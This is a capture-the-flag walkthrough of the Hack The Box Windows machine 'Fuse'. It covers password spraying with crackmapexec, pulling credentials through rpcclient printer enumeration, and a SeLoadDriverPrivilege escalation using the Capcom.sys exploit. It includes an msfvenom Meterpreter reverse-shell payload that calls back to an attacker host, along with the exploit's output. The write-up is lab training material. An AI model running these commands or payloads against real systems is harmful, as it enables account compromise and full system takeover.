3.1
(11)

Introduction

NameFuse
OSWindows
Points30
Difficultymedium
Creatoregre55
Hackthebox Fuse writeup - 10.10.10.193

Steps involved

1-Port scan
2-Enumerating website
3-Making wordlist
4-Changing Password
5-Enumerating printers via rpcclient
6-Getting User flag
7-Exploiting  SeLoadDriverPrivilege
8-Getting root flag

Lessons learned

1-Basic port Scan
2-Making custom word-list via CeWL
3-Changing user password by smbpasswd
4-Enumeration via RPCCLient
5-Exploitation of  SeLoadDriverPrivilege

Commands involved

1-nmap -sC -sV -v -oN nmap 10.10.10.193
2-cewl -d 5 -m 5 --with-numbers -w docswords.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm
3-crackmapexec smb 10.10.10.193 -u user -p docswords.txt
4-\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
5-.\ExploitCapcom.exe

Port Scan

➜ fuse cat nmap
Nmap 7.80 scan initiated Sat Jun 13 20:14:13 2020 as: nmap -sC -sV -v -oN nmap 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.25s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-14 03:32:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/13%Time=5EE56BFD%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|clock-skew: mean: 5h37m38s, deviation: 4h02m30s, median: 3h17m37s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Fuse | NetBIOS computer name: FUSE\x00 | Domain name: fabricorp.local | Forest name: fabricorp.local | FQDN: Fuse.fabricorp.local | System time: 2020-06-13T20:34:54-07:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-14T03:34:57
|_ start_date: 2020-06-13T22:06:36

The first service that I check is http. so let’s see what it has.But don’t forget to update your /etc/hosts file.

Hackthebox Fuse writeup - 10.10.10.193
Here on the website we have three files which contains potential user names .
So let's see and add those to a list.

After a little time I used Cewl tool .To see if I can get some credentials .

➜ fuse cewl -d 5 -m 5 --with-numbers -w docswords.txt http://fuse.fabricorp.local/papercut/logs/html/index.htm

And we got a word list which we can use for brute force.

And here is the potentials user names which I got from CSV files.

➜ fuse cat users
pmerton
tlavel
sthompson
bhult
administrator

I used crackmapexec for brute forcing .

➜ fuse crackmapexec smb 10.10.10.193 -u user -p docswords.txt
Hackthebox Fuse writeup - 10.10.10.193

At first I didn’t see anything important in it .But After looking it carefully I found this.

➜  fuse cat tmp | grep Fabricorp01
SMB         10.10.10.193    445    FUSE             [-] FABRICORP\pmerton:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP\tlavel:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP\sthompson:Fabricorp01 STATUS_LOGON_FAILURE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP\bhult:Fabricorp01 STATUS_PASSWORD_MUST_CHANGE 
SMB         10.10.10.193    445    FUSE             [-] FABRICORP\administrator:Fabricorp01 STATUS_LOGON_FAILURE 

On the password Fabricorp01 I got password must change .

So for changing the password I used smbpasswd

Hackthebox Fuse writeup - 10.10.10.193

After changing the password I logged into smb but couldn’t find anything important .So I logged into the rpcclient .

The trick here was that the website we got was related to printers .So I enumerated the information of printers .And found the creds .

Hackthebox Fuse writeup - 10.10.10.193
Hackthebox Fuse writeup - 10.10.10.193

After getting the password I logged into the account and got the user flag in it.

Hackthebox Fuse writeup - 10.10.10.193

For privilege escalation I always start with enumerating the groups and privileges of the user.

Hackthebox Fuse writeup - 10.10.10.193

SeLoadDriverPrivilege looks interesting so I moved forward with it.

Hackthebox Fuse writeup - 10.10.10.193

For privilege escalation I followed this article .

The files needed were eoploaddriver.cpp , ExploitCapcom.cpp and capcom.sys

The one change that we had to make was in ExploitCapcom.cpp in the Launchshell ()

static bool LaunchShell() { TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");

We needed to edit the path of our payload instead of the default one.

Now let’s create a payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.97 LPORT=4444 -f exe > shell.exe

Then I uploaded it in the test directory because it was written in the readme.txt

Now Create the registry key under HKEY_CURRENT_USER (HKCU) and set driver configuration settings

*Evil-WinRM* PS C:\test> .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys [+] Enabling SeLoadDriverPrivilege 
[+] SeLoadDriverPrivilege Enabled 
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService NTSTATUS: 00000000, WinError: 0

And now run the program for final step.

*Evil-WinRM* PS C:\test> .\ExploitCapcom.exe
[*] Capcom.sys exploit 
[*] Capcom.sys handle was obtained as 0000000000000064 [*] Shellcode was placed at 000002B6CF0B0008 
[+] Shellcode was executed 
[+] Token stealing was successful 
[+] The SYSTEM shell was launched 
[*] Press any key to exit this program 
*Evil-WinRM* PS C:\test>

And now let’s see on our multi handler.

msf5 exploit(multi/handler) > run 
[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Sending stage (176195 bytes) to 10.10.10.193 
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.193:50134) at 2020-06-17 02:27:11 -0400 meterpreter > shell 
Process 576 created. Channel 1 created. Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. 

C:\test>whoami 
whoami 
nt authority\system
 C:\test>cd /Users/Administrator/Desktop
C:\Users\Administrator\Desktop>type root.txt 
type root.txt 
3######################7 
C:\Users\Administrator\Desktop>

How useful was this post?

Click on a star to rate it!

Average rating 3.1 / 5. Vote count: 11

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Reply

Your email address will not be published. Required fields are marked *